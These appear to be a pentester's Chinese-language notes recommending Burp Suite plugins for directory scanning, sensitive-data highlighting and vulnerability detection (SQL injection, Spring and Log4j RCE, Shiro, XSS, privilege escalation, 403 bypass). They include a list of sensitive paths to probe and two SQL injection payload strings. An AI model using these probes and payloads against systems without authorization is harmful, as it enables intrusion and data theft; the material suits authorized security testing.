Burp插件
目录
目录扫描
APIKit
找swagger这种api接口的
onescan
递归爆破目录https://github.com/vaycore/OneScan
目标站点访问:http://www.xxxxxx.com/a/b/c/xxx.min.js
,插件会自动扫描如下的路径:
http://www.xxxxxx.com/api-docs
http://www.xxxxxx.com/xxxxxx.zip
http://www.xxxxxx.com/a/api-docs
http://www.xxxxxx.com/a/xxxxxx.zip
http://www.xxxxxx.com/a/b/api-docs
http://www.xxxxxx.com/a/b/xxxxxx.zip
http://www.xxxxxx.com/a/b/c/api-docs
http://www.xxxxxx.com/a/b/c/xxxxxx.zip
/v2/api-docs
/api/v1
/api/v2
/api/v1/
/api/v2/
/{{domain}}.zip
/{{domain.main}}.zip
/{{domain.name}}.zip
/env
/actuator
/jolokia/list
/swagger-resources
/v1/swagger.json
/v2/swagger.json
/druid/index.html
/druid/basic.json
/.git
敏感信息
HaE
在报文里高亮敏感信息。
必装
漏扫
xiaSQL
简单的SQl注入扫描,原理很简单就是在请求最后加个单引号查看响应的变化
'%20or%201='1
'%20and%20sleep(5)#
BurpFastJsonScan
https://github.com/pmiaowu/BurpFastJsonScan
检测方式:命令回显/dnslog 用burp自带的collabrator就可以了
SpringScan
- Spring Core RCE (CVE-2022-22965)
- Spring Cloud Function SpEL RCE (CVE-2022-22963)
- Spring Cloud GateWay SPEL RCE (CVE-2022-22947)
https://github.com/metaStor/SpringScan 需dnslog
选装,感觉实战用处不太大,不容易扫到
Log4j2Scan
https://github.com/whwlsfb/Log4j2Scan
被动扫描log4j漏洞,需dnslog
选装,实战不容易扫到
BurpShiroPassiveScan
shiro扫描
https://github.com/pmiaowu/BurpShiroPassiveScan
探测shiro+探测key(不用dnslog等外连网站)
选装,实战不容易扫到,而且onescan里也有shiro的指纹识别
reflector
https://github.com/elkokc/reflector
xss检测
xiayue
https://github.com/smxiazi/xia_Yue
测越权,和xiayue一个作者,这个作者太牛批了,简单粗暴
403bypasser
https://github.com/sting8k/BurpSuite_403Bypasser
绕过403寻找惊喜 需jython支持